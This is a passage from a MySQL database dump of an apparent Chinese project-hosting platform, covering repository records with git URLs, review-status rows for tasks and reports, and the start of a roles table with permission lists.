L,NULL,NULL,NULL,'xiaomi',0,0,NULL,NULL,39,'https://git.trustie.net/ZYL000/xiaomi.git',0,NULL,0),(410,352,'','p25903841','','',NULL,NULL,NULL,NULL,'contest',0,0,NULL,NULL,95,'https://git.trustie.net/Tom/contest.git',0,NULL,0),(411,353,'','p04153627','','',NULL,NULL,NULL,NULL,'ranking',0,0,NULL,NULL,19,'https://git.trustie.net/qiangge/ranking.git',0,NULL,0),(412,354,'','p49256387','','',NULL,NULL,NULL,NULL,'my_robot',0,0,NULL,NULL,94,'https://git.trustie.net/KK/my_robot.git',0,NULL,0),(413,355,'','p23041857','','',NULL,NULL,NULL,NULL,'final',0,0,NULL,NULL,53,'https://git.trustie.net/the/final.git',0,NULL,0),(414,356,'','p27318694','','',NULL,NULL,NULL,NULL,'codepedia2',0,0,NULL,NULL,16,'https://git.trustie.net/wrm1995/codepedia2.git',0,NULL,0),(415,357,'','p91207356','','',NULL,NULL,NULL,NULL,'guoren',0,0,NULL,NULL,109,'https://git.trustie.net/zhujingqiao/guoren.git',0,NULL,0),(416,358,'','p78602431','','',NULL,NULL,NULL,NULL,'xiaomi_note3',0,0,NULL,NULL,5,'https://git.trustie.net/LuLuLu/xiaomi_note3.git',0,NULL,0),(417,359,'','p93105276','','',NULL,NULL,NULL,NULL,'master2017',0,0,NULL,NULL,30,'https://git.trustie.net/leo_knz/master2017.git',0,NULL,0),(418,360,'','p81473620','','',NULL,NULL,NULL,NULL,'projectgit',0,0,NULL,NULL,35,'https://git.trustie.net/tanghaoranzhang/projectgit.git',0,NULL,0),(419,361,'','p15679402','','',NULL,NULL,NULL,NULL,'bigdata',0,0,NULL,NULL,56,'https://git.trustie.net/guange/bigdata.git',0,NULL,0),(420,362,'','p19083625','','',NULL,NULL,NULL,NULL,'dandan321',0,0,NULL,NULL,41,'https://git.trustie.net/HaruYang/dandan321.git',0,NULL,0),(421,363,'','p49023187','','',NULL,NULL,NULL,NULL,'xiaomi_note3-1',0,0,NULL,NULL,4,'https://git.trustie.net/ladventure/xiaomi_note3-1.git',0,NULL,0),(422,364,'','p38079451','','',NULL,NULL,NULL,NULL,'project',0,0,NULL,NULL,25,'https://git.trustie.net/wood/project.git',0,NULL,0),(423,365,'','p49023857','','',NULL,NULL,NULL,NULL,'r-memcached',0,0,NULL,NULL,104,'https://git.trustie.net/lyr90329/r-memcached.git',0,NULL,0),(424,366,'','p49023187','','',NULL,NULL,NULL,NULL,'git_cross_issue',0,0,NULL,NULL,4,'https://git.trustie.net/RongEr/git_cross_issue.git',0,NULL,0),(425,367,'','p36850791','','',NULL,NULL,NULL,NULL,'python_sonar',0,0,NULL,NULL,54,'https://git.trustie.net/hushasha/python_sonar.git',0,NULL,0),(426,368,'','p40918326','','',NULL,NULL,NULL,NULL,'group_fighting',0,0,NULL,NULL,15,'https://git.trustie.net/lileilei/group_fighting.git',0,NULL,0),(427,369,'','p49023857','','',NULL,NULL,NULL,NULL,'find-classroom',0,0,NULL,NULL,104,'https://git.trustie.net/lihanzheng/find-classroom.git',0,NULL,0),(428,370,'','p78543092','','',NULL,NULL,NULL,NULL,'geo_info_platform',0,0,NULL,NULL,46,'https://git.trustie.net/qiubing/geo_info_platform.git',0,NULL,0),(429,371,'','p81523470','','',NULL,NULL,NULL,NULL,'webssh',0,0,NULL,NULL,26,'https://git.trustie.net/guange/webssh.git',0,NULL,0),(432,374,'http://47.95.219.161:3000/innov/private_project_test.git','','','',NULL,NULL,NULL,NULL,'private_project_test',0,1,NULL,NULL,1,NULL,0,NULL,0),(433,375,'http://47.95.219.161:3000/p51497208/ghyu.git','','','',NULL,NULL,NULL,NULL,'ghyu',0,1,NULL,NULL,49,NULL,0,NULL,0),(434,376,'http://47.95.219.161:3000/innov/issue.git','','','',NULL,NULL,NULL,NULL,'issue',0,0,NULL,NULL,1,NULL,0,NULL,0),(436,378,'http://47.95.219.161:3000/p85126437/refactor.git','','','',NULL,NULL,NULL,NULL,'refactor',0,0,NULL,NULL,115,NULL,0,NULL,0),(437,379,'http://47.95.219.161:3000/p51497208/issue.git','','','',NULL,NULL,NULL,NULL,'issue',0,0,NULL,NULL,49,NULL,0,NULL,0),(447,389,'http://47.95.219.161:3000/p64583910/MIllf_P.git','','','',NULL,NULL,NULL,NULL,'MIllf_P',0,0,NULL,NULL,48,NULL,0,NULL,0),(449,391,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'diboot',0,0,NULL,NULL,47,'https://gitee.com/dibo_software/diboot.git',0,NULL,NULL),(450,392,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'amis',0,0,NULL,NULL,47,'https://gitee.com/baidu/amis.git',0,NULL,NULL),(451,393,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'military-server',0,1,NULL,NULL,48,'http://git.trustie.net/jasder/military-server.git',0,NULL,1),(453,395,'http://47.95.219.161:3000/p85126437/amis.git','','','',NULL,NULL,NULL,NULL,'amis',0,0,NULL,NULL,115,NULL,0,NULL,0),(454,396,'http://47.95.219.161:3000/innov/ets_project_language.git','','','',NULL,NULL,NULL,NULL,'ets_project_language',0,0,NULL,NULL,1,NULL,0,NULL,0),(455,397,'http://47.95.219.161:3000/p51497208/geo_info_platform.git','','','',NULL,NULL,NULL,NULL,'geo_info_platform',0,0,NULL,NULL,49,NULL,0,NULL,0),(456,398,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'lenosp',0,0,NULL,NULL,49,'https://gitee.com/davaidli/lenosp.git',0,NULL,NULL),(458,400,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'SpringbootMybatis',0,0,NULL,NULL,50,'https://github.com/LuoGF/SpringbootMybatis.git',0,NULL,NULL),(462,404,'http://47.95.219.161:3000/p78543092/SpringbootMybatis.git','','','',NULL,NULL,NULL,NULL,'SpringbootMybatis',0,0,NULL,NULL,46,NULL,0,NULL,0),(488,430,'http://47.95.219.161:3000/p21506749/special.git','','','',NULL,NULL,NULL,NULL,'special',0,1,NULL,NULL,134,NULL,0,NULL,0),(505,447,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'geo_info_platform',0,0,NULL,NULL,115,'http://47.95.219.161:3000/p51497208/geo_info_platform.git',0,NULL,NULL),(506,448,'http://47.95.219.161:3000/p85126437/PHengLei.git','','','',NULL,NULL,NULL,NULL,'PHengLei',0,1,NULL,NULL,115,NULL,0,NULL,0),(511,453,'http://47.95.219.161:3000/p85126437/issue.git','','','',NULL,NULL,NULL,NULL,'issue',0,0,NULL,NULL,115,NULL,0,NULL,0),(528,470,'http://47.95.219.161:3000/p53467921/qqq.git','','','',NULL,NULL,NULL,NULL,'qqq',0,0,NULL,NULL,129,NULL,0,NULL,0),(530,472,'http://47.95.219.161:3000/p42689073/test.git','','','',NULL,NULL,NULL,NULL,'test',0,1,NULL,NULL,155,NULL,0,NULL,0),(531,473,'http://47.95.219.161:3000/p42689073/geo_info_platform.git','','','',NULL,NULL,NULL,NULL,'geo_info_platform',0,0,NULL,NULL,155,NULL,1,NULL,0),(532,474,'http://47.95.219.161:3000/p42689073/test02.git','','','',NULL,NULL,NULL,NULL,'test02',0,1,NULL,NULL,155,NULL,2,NULL,0),(533,475,'http://47.95.219.161:3000/p42689073/test02.git','','','',NULL,NULL,NULL,NULL,'test02',0,1,NULL,NULL,155,NULL,0,NULL,0),(534,476,'http://47.95.219.161:3000/p42689073/test04.git','','','',NULL,NULL,NULL,NULL,'test04',0,1,NULL,NULL,155,NULL,0,NULL,0),(535,477,'http://47.95.219.161:3000/p68217053/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,156,NULL,0,NULL,0),(536,478,'http://47.95.219.161:3000/p02563791/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,158,NULL,0,NULL,0),(537,479,'http://47.95.219.161:3000/p24935176/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,157,NULL,0,NULL,0),(538,480,'http://47.95.219.161:3000/p92503478/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,137,NULL,0,NULL,0),(539,481,'http://47.95.219.161:3000/p98607135/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,122,NULL,0,NULL,0),(540,482,'http://47.95.219.161:3000/p52791048/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,120,NULL,0,NULL,0),(541,483,'http://47.95.219.161:3000/p78543092/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,46,NULL,0,NULL,0),(543,485,'http://47.95.219.161:3000/p45127936/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,159,NULL,0,NULL,0),(544,486,'http://47.95.219.161:3000/p27184396/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,121,NULL,0,NULL,0),(545,487,'http://47.95.219.161:3000/p84673591/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,152,NULL,0,NULL,0),(546,488,'http://47.95.219.161:3000/p74391568/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,160,NULL,0,NULL,0),(547,489,'http://47.95.219.161:3000/p60728945/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,164,NULL,0,NULL,0),(548,490,'http://47.95.219.161:3000/p42689073/test08.git','','','',NULL,NULL,NULL,NULL,'test08',0,0,NULL,NULL,155,NULL,0,NULL,0),(549,491,'http://47.95.219.161:3000/p51497208/test.git','','','',NULL,NULL,NULL,NULL,'test',0,1,NULL,NULL,49,NULL,0,NULL,0),(550,492,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'reack',0,0,NULL,NULL,49,'https://github.com/facebook/reack.git',0,NULL,NULL),(552,494,'http://47.95.219.161:3000/p51497208/test11.git','','','',NULL,NULL,NULL,NULL,'test11',0,0,NULL,NULL,49,NULL,0,NULL,0),(553,495,'http://47.95.219.161:3000/p93612587/test11.git','','','',NULL,NULL,NULL,NULL,'test11',0,0,NULL,NULL,73,NULL,0,NULL,0),(554,496,'http://47.95.219.161:3000/p85749103/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,182,NULL,0,NULL,0),(555,497,'',NULL,'dW5kZWZpbmVk','',NULL,NULL,NULL,NULL,'Gitee-Jenkins-Plugin',0,0,NULL,NULL,181,'https://gitee.com/oschina/Gitee-Jenkins-Plugin.git',0,NULL,NULL),(558,500,'http://47.95.219.161:3000/p15693087/special.git','','','',NULL,NULL,NULL,NULL,'special',0,1,NULL,NULL,128,NULL,0,NULL,0),(559,501,'http://47.95.219.161:3000/p85947160/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,181,NULL,0,NULL,0),(561,503,'http://47.95.219.161:3000/p76243581/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,179,NULL,0,NULL,0),(562,504,'http://47.95.219.161:3000/innov/issue.git','','','',NULL,NULL,NULL,NULL,'issue',0,0,NULL,NULL,1,NULL,0,NULL,0),(563,505,'https://git.osredm.com/p64583910/testSimple.git','','','',NULL,NULL,NULL,NULL,'testSimple',0,1,NULL,NULL,48,NULL,0,NULL,0),(564,506,'https://git.osredm.com/p32491587/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,173,NULL,0,NULL,0),(565,507,'https://git.osredm.com/p28690714/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,165,NULL,0,NULL,0),(570,512,'https://git.osredm.com/p75068923/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,186,NULL,0,NULL,0),(571,513,'https://git.osredm.com/p50379126/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,206,NULL,0,NULL,0),(572,514,'https://git.osredm.com/p12056437/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,171,NULL,0,NULL,0),(573,515,'https://git.osredm.com/p97826145/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,189,NULL,0,NULL,0),(574,516,'https://git.osredm.com/p15823679/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,162,NULL,0,NULL,0),(575,517,'https://git.osredm.com/p14639075/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,190,NULL,0,NULL,0),(576,518,'https://git.osredm.com/p83425619/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,174,NULL,0,NULL,0),(577,519,'https://git.osredm.com/innov/test1111.git','','','',NULL,NULL,NULL,NULL,'test1111',0,1,NULL,NULL,1,NULL,0,NULL,0),(578,520,'https://git.osredm.com/p19523807/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,215,NULL,0,NULL,0),(579,521,'https://git.osredm.com/p91278563/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,210,NULL,0,NULL,0),(580,522,'https://git.osredm.com/p85947160/geo_info_platform.git','','','',NULL,NULL,NULL,NULL,'geo_info_platform',0,0,NULL,NULL,181,NULL,0,NULL,0),(581,523,'https://git.osredm.com/p60978425/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,216,NULL,0,NULL,0),(582,524,'https://git.osredm.com/p82167049/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,218,NULL,0,NULL,0),(583,525,'https://git.osredm.com/p45906281/PHengLEI.git','','','',NULL,NULL,NULL,NULL,'PHengLEI',0,1,NULL,NULL,194,NULL,0,NULL,0);
|
||
/*!40000 ALTER TABLE `repositories` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `reviews`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `reviews`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `reviews` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`reason` text,
|
||
`status` int(11) DEFAULT NULL,
|
||
`reviewable_id` int(11) DEFAULT NULL,
|
||
`reviewable_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`user_id` int(11) NOT NULL,
|
||
`source` varchar(255) DEFAULT NULL,
|
||
`verifier_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=160 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `reviews`
|
||
--
|
||
|
||
LOCK TABLES `reviews` WRITE;
|
||
/*!40000 ALTER TABLE `reviews` DISABLE KEYS */;
|
||
INSERT INTO `reviews` VALUES (1,NULL,0,2,'Task','2019-08-07 15:46:16','2019-08-07 15:46:16',46,'manage',NULL),(2,NULL,0,8,'Task','2019-08-13 08:55:30','2019-08-13 08:55:30',50,'manage',NULL),(5,NULL,0,7,'Task','2019-08-13 14:35:15','2019-08-13 14:35:15',50,'sign',NULL),(6,NULL,0,13,'Task','2019-08-13 15:27:08','2019-08-13 15:27:08',50,'manage',NULL),(7,NULL,0,11,'Task','2019-08-13 15:57:45','2019-08-13 15:57:45',46,'manage',NULL),(9,NULL,0,15,'Task','2019-08-23 12:56:55','2019-08-23 12:56:55',50,'manage',NULL),(10,NULL,0,1,'PaperReport','2019-08-23 15:11:05','2019-08-23 15:11:05',50,'report',NULL),(12,NULL,0,18,'Task','2019-08-26 09:56:02','2019-08-26 09:56:02',50,'manage',NULL),(13,NULL,0,20,'Task','2019-08-26 10:41:32','2019-08-26 10:41:32',50,'manage',NULL),(14,NULL,0,21,'Task','2019-08-26 10:44:48','2019-08-26 10:44:48',50,'manage',NULL),(15,NULL,0,22,'Task','2019-08-26 10:45:40','2019-08-26 10:45:40',50,'manage',NULL),(16,NULL,0,10,'Task','2019-08-26 10:45:42','2019-08-26 10:45:42',50,'manage',NULL),(17,NULL,0,24,'Task','2019-09-16 10:27:05','2019-09-16 10:27:05',52,'manage',NULL),(18,NULL,0,29,'Task','2019-10-25 09:44:20','2019-10-25 09:44:20',49,'manage',NULL),(19,NULL,0,25,'Task','2019-10-25 15:08:01','2019-10-25 15:08:01',46,'proof',NULL),(20,NULL,0,25,'Task','2019-10-25 15:21:07','2019-10-25 15:21:40',49,'sign',46),(21,NULL,0,25,'Task','2019-10-25 15:24:44','2019-10-25 15:25:11',49,'payment_voucher',46),(22,NULL,0,29,'Task','2019-10-25 15:34:18','2019-10-25 15:34:18',46,'proof',NULL),(23,NULL,0,26,'Task','2019-10-25 16:19:49','2019-10-25 16:19:49',46,'proof',NULL),(24,NULL,0,30,'Task','2019-10-27 14:22:25','2019-10-27 14:22:25',46,'proof',NULL),(25,NULL,0,30,'Task','2019-10-27 14:27:50','2019-10-27 14:29:40',49,'sign',46),(26,NULL,0,30,'Task','2019-10-27 14:32:28','2019-10-27 14:32:41',49,'payment_voucher',46),(28,NULL,0,32,'Task','2019-10-27 15:00:40','2019-10-27 15:00:40',46,'manage',NULL),(29,NULL,0,32,'Task','2019-10-27 15:09:25','2019-10-27 15:09:25',46,'proof',NULL),(36,NULL,0,2,'PaperReport','2019-10-29 09:30:23','2019-10-29 09:30:23',50,'report',NULL),(43,NULL,1,51,'Task','2019-11-05 10:16:29','2019-11-05 10:16:29',50,'manage',NULL),(44,NULL,1,41,'Task','2019-11-05 10:16:32','2019-11-05 10:16:32',50,'manage',NULL),(45,NULL,0,54,'Task','2019-11-05 15:11:22','2019-11-05 15:11:22',50,'manage',NULL),(46,NULL,0,54,'Task','2019-11-05 15:52:22','2019-11-05 15:52:22',50,'proof',NULL),(47,NULL,0,57,'Task','2019-11-06 17:07:13','2019-11-06 17:07:13',46,'manage',NULL),(48,NULL,0,57,'Task','2019-11-06 17:14:09','2019-11-06 17:14:09',46,'proof',NULL),(49,NULL,0,57,'Task','2019-11-06 17:14:14','2019-11-06 17:14:14',46,'proof',NULL),(52,NULL,0,58,'Task','2019-11-07 11:27:44','2019-11-07 11:27:44',50,'manage',NULL),(55,NULL,0,199,'Project','2019-11-07 15:51:07','2019-11-07 15:51:33',49,NULL,46),(56,NULL,0,60,'Task','2019-11-07 16:44:26','2019-11-07 16:44:26',46,'manage',NULL),(57,NULL,0,60,'Task','2019-11-07 16:53:09','2019-11-07 16:53:09',46,'proof',NULL),(58,NULL,0,61,'Task','2019-11-10 13:33:36','2019-11-10 13:33:36',50,'manage',NULL),(59,NULL,0,65,'Task','2019-11-10 13:33:47','2019-11-10 13:33:47',50,'manage',NULL),(61,NULL,0,63,'Task','2019-11-10 13:33:52','2019-11-10 13:33:52',50,'manage',NULL),(62,NULL,0,62,'Task','2019-11-10 13:33:54','2019-11-10 13:33:54',50,'manage',NULL),(64,NULL,0,62,'Task','2019-11-10 13:50:46','2019-11-10 13:50:46',50,'proof',NULL),(65,NULL,0,61,'Task','2019-11-10 13:50:50','2019-11-10 13:50:50',50,'proof',NULL),(78,NULL,0,219,'Project','2019-11-11 10:47:56','2019-11-22 08:52:17',50,NULL,50),(82,NULL,0,232,'Project','2019-11-11 17:07:52','2019-11-11 17:08:08',49,NULL,50),(89,NULL,0,69,'Task','2019-11-13 08:54:44','2019-11-13 08:54:44',46,'proof',NULL),(90,NULL,0,69,'Task','2019-11-13 09:08:27','2019-11-13 09:09:28',49,'sign',46),(91,NULL,2,69,'Task','2019-11-13 09:15:26','2019-11-13 09:15:26',49,'payment_voucher',NULL),(103,'因延期被管理员关闭',1,25,'Task','2019-11-24 19:10:51','2019-11-24 19:10:51',50,'proof',NULL),(105,NULL,0,94,'Task','2019-12-30 10:01:51','2019-12-30 10:01:51',46,'manage',NULL),(106,NULL,0,92,'Task','2019-12-30 15:41:09','2019-12-30 15:41:09',50,'proof',NULL),(107,NULL,0,251,'Project','2020-02-01 19:03:09','2020-02-03 12:18:30',75,NULL,47),(108,NULL,0,252,'Project','2020-02-01 21:17:31','2020-02-03 12:18:32',75,NULL,47),(109,NULL,0,254,'Project','2020-02-02 23:36:38','2020-02-03 12:10:02',77,NULL,47),(110,NULL,0,255,'Project','2020-02-03 12:08:29','2020-02-03 12:18:26',77,NULL,47),(111,NULL,0,256,'Project','2020-02-03 16:57:11','2020-02-03 17:00:03',55,NULL,1),(112,NULL,0,257,'Project','2020-02-03 17:36:28','2020-02-03 17:38:22',78,NULL,1),(113,NULL,0,258,'Project','2020-02-03 17:45:42','2020-02-03 17:46:45',48,NULL,47),(114,NULL,0,259,'Project','2020-02-03 19:30:28','2020-02-11 10:06:32',47,NULL,46),(116,NULL,0,266,'Project','2020-02-11 09:30:09','2020-02-11 09:50:25',103,NULL,47),(117,NULL,0,270,'Project','2020-02-11 10:06:32','2020-02-11 10:07:01',47,NULL,46),(118,NULL,0,273,'Project','2020-03-14 09:33:12','2020-03-18 16:32:32',51,NULL,1),(119,NULL,0,101,'Task','2020-03-23 09:17:45','2020-03-23 09:17:45',1,'manage',NULL),(120,NULL,0,100,'Task','2020-03-23 09:31:40','2020-03-23 09:31:40',1,'manage',NULL),(121,NULL,0,100,'Task','2020-03-23 10:30:30','2020-03-23 10:30:30',1,'proof',NULL),(122,NULL,0,5,'PaperReport','2020-03-23 10:42:54','2020-03-23 10:42:54',1,'report',NULL),(123,'暗室逢灯',1,6,'PaperReport','2020-03-23 10:43:34','2020-03-23 10:43:34',1,'report',NULL),(124,NULL,0,7,'PaperReport','2020-03-23 10:57:16','2020-03-23 10:57:16',1,'report',NULL),(125,NULL,0,8,'PaperReport','2020-03-23 10:59:03','2020-03-23 10:59:03',1,'report',NULL),(126,NULL,0,89,'Task','2020-03-23 14:47:04','2020-03-23 14:47:04',46,'manage',NULL),(127,NULL,0,103,'Task','2020-03-23 14:49:39','2020-03-23 14:49:39',46,'manage',NULL),(128,'中心组想看看稿件',1,9,'PaperReport','2020-03-23 15:21:02','2020-03-23 15:21:02',46,'report',NULL),(129,NULL,1,12,'PaperReport','2020-03-23 15:29:27','2020-03-23 15:29:27',46,'report',NULL),(130,NULL,0,13,'PaperReport','2020-03-23 15:38:59','2020-03-23 15:38:59',1,'report',NULL),(131,NULL,0,11,'PaperReport','2020-03-23 15:39:28','2020-03-23 15:39:28',1,'report',NULL),(132,NULL,0,106,'Task','2020-03-24 08:48:44','2020-03-24 08:48:44',1,'manage',NULL),(133,NULL,0,108,'Task','2020-03-24 17:12:48','2020-03-24 17:12:48',1,'proof',NULL),(134,NULL,0,104,'Task','2020-03-24 17:18:56','2020-03-24 17:18:56',1,'proof',NULL),(135,NULL,0,105,'Task','2020-03-25 09:19:36','2020-03-25 09:19:36',1,'proof',NULL),(136,NULL,0,95,'Task','2020-03-25 16:08:45','2020-03-25 16:08:45',46,'proof',NULL),(137,NULL,0,96,'Task','2020-03-25 16:17:49','2020-03-25 16:17:49',46,'proof',NULL),(138,NULL,0,98,'Task','2020-03-25 16:25:46','2020-03-25 16:25:46',46,'proof',NULL),(139,'测试拒绝及其后续流程',1,99,'Task','2020-03-25 16:35:05','2020-03-25 16:35:05',46,'proof',NULL),(140,'违反收费',1,99,'Task','2020-03-25 16:40:33','2020-03-25 16:40:33',46,'proof',NULL),(141,NULL,0,99,'Task','2020-03-25 16:42:43','2020-03-25 16:42:43',46,'proof',NULL),(142,NULL,0,274,'Project','2020-03-27 19:19:54','2020-04-03 09:30:35',45,NULL,1),(143,NULL,0,103,'Task','2020-04-02 15:36:16','2020-04-02 15:36:16',1,'proof',NULL),(144,NULL,0,114,'Task','2020-04-10 10:01:27','2020-04-10 10:01:27',46,'proof',NULL),(145,NULL,2,275,'Project','2020-05-13 09:17:41','2020-05-13 09:17:41',46,NULL,NULL),(146,NULL,0,116,'Task','2020-10-15 17:28:10','2020-10-15 17:28:10',46,'proof',NULL),(147,NULL,0,117,'Task','2020-10-16 08:07:48','2020-10-16 08:07:48',46,'proof',NULL),(148,NULL,0,115,'Task','2020-10-16 08:24:48','2020-10-16 08:24:48',46,'proof',NULL),(149,NULL,0,117,'Task','2020-10-16 08:29:47','2020-10-16 08:30:41',49,'sign',46),(150,NULL,0,117,'Task','2020-10-16 08:32:38','2020-10-16 08:33:24',49,'payment_voucher',46),(151,NULL,0,118,'Task','2020-10-16 08:56:33','2020-10-16 08:56:33',46,'proof',NULL),(152,NULL,0,118,'Task','2020-10-16 09:00:36','2020-10-16 09:02:16',49,'sign',46),(153,NULL,0,118,'Task','2020-10-16 09:03:25','2020-10-16 09:05:47',49,'payment_voucher',46),(154,NULL,0,119,'Task','2020-10-16 15:00:15','2020-10-16 15:00:15',46,'proof',NULL),(155,NULL,0,121,'Task','2021-02-23 16:34:36','2021-02-23 16:34:36',1,'proof',NULL),(156,'因延期被管理员关闭',1,101,'Task','2021-02-23 16:40:16','2021-02-23 16:40:16',1,'signing',NULL),(157,'因延期被管理员关闭',1,95,'Task','2021-02-23 16:40:23','2021-02-23 16:40:23',1,'signing',NULL),(158,'因延期被管理员关闭',1,105,'Task','2021-02-23 16:40:34','2021-02-23 16:40:34',1,'signing',NULL),(159,NULL,0,122,'Task','2021-02-23 16:53:46','2021-02-23 16:53:46',1,'proof',NULL);
|
||
/*!40000 ALTER TABLE `reviews` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `roles`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `roles`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `roles` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(30) NOT NULL DEFAULT '',
|
||
`position` int(11) DEFAULT '1',
|
||
`assignable` tinyint(1) DEFAULT '1',
|
||
`builtin` int(11) NOT NULL DEFAULT '0',
|
||
`permissions` text,
|
||
`issues_visibility` varchar(30) NOT NULL DEFAULT 'default',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `roles`
|
||
--
|
||
|
||
LOCK TABLES `roles` WRITE;
|
||
/*!40000 ALTER TABLE `roles` DISABLE KEYS */;
|
||
INSERT INTO `roles` VALUES (1,'Non member',1,1,1,'---\n- :upload_attachments\n- :memos_attachments_download\n- :add_project\n- :projects_attachments_download\n- :add_course\n- :course_attachments_download\n- :view_course_files\n- :add_messages\n- :delete_own_messages\n- :view_calendar\n- :view_documents\n- :view_files\n- :view_gantt\n- :view_issues\n- :save_queries\n- :comment_news\n- :browse_repository\n- :view_changesets\n- :view_time_entries\n- :view_wiki_pages\n- :view_wiki_edits\n','default'),(2,'Anonymous',2,1,2,'---\n- :memos_attachments_download\n- :view_course_files\n- :view_calendar\n- :view_documents\n- :view_files\n- :view_gantt\n- :view_issues\n- :browse_repository\n- :view_changesets\n- :view_time_entries\n- :view_wiki_pages\n- :view_wiki_edits\n','default'),(3,'Manager',3,1,0,'---\n- :add_project\n- :edit_project\n- :close_project\n- :select_project_modules\n- :manage_members\n- :manage_versions\n- :add_subprojects\n- :is_manager\n- :projects_attachments_download\n- :as_teacher\n- :add_course\n- :edit_course\n- :close_course\n- :select_course_modules\n- :view_course_journals_for_messages\n- :course_attachments_download\n- :view_course_files\n- :view_homework_attaches\n- :quote_project\n- :manage_boards\n- :add_messages\n- :edit_messages\n- :edit_own_messages\n- :delete_messages\n- :delete_own_messages\n- :view_calendar\n- :view_code_review\n- :add_code_review\n- :edit_code_review\n- :delete_code_review\n- :assign_code_review\n- :code_review_setting\n- :add_documents\n- :edit_documents\n- :delete_documents\n- :view_documents\n- :manage_files\n- :view_files\n- :view_gantt\n- :manage_categories\n- :view_issues\n- :add_issues\n- :edit_issues\n- :manage_issue_relations\n- :manage_subtasks\n- :set_issues_private\n- :set_own_issues_private\n- :add_issue_notes\n- :edit_issue_notes\n- :edit_own_issue_notes\n- :view_private_notes\n- :set_notes_private\n- :move_issues\n- :delete_issues\n- :manage_public_queries\n- :save_queries\n- :view_issue_watchers\n- :add_issue_watchers\n- :delete_issue_watchers\n- :manage_news\n- :comment_news\n- :manage_repository\n- :browse_repository\n- :view_changesets\n- :commit_access\n- :manage_related_issues\n- :log_time\n- :view_time_entries\n- :edit_time_entries\n- :edit_own_time_entries\n- :manage_project_activities\n- :manage_wiki\n- :rename_wiki_pages\n- :delete_wiki_pages\n- :view_wiki_pages\n- :export_wiki_pages\n- :view_wiki_edits\n- :edit_wiki_pages\n- :delete_wiki_pages_attachments\n- :protect_wiki_pages\n','all'),(4,'Developer',5,1,0,'---\n- :add_project\n- :manage_versions\n- :projects_attachments_download\n- :add_course\n- :edit_course\n- :close_course\n- :select_course_modules\n- :view_course_journals_for_messages\n- :course_attachments_download\n- :view_course_files\n- :view_homework_attaches\n- :paret_in_homework\n- :select_contest_modules\n- :quote_project\n- :contest_attachments_download\n- :manage_contestnotifications\n- 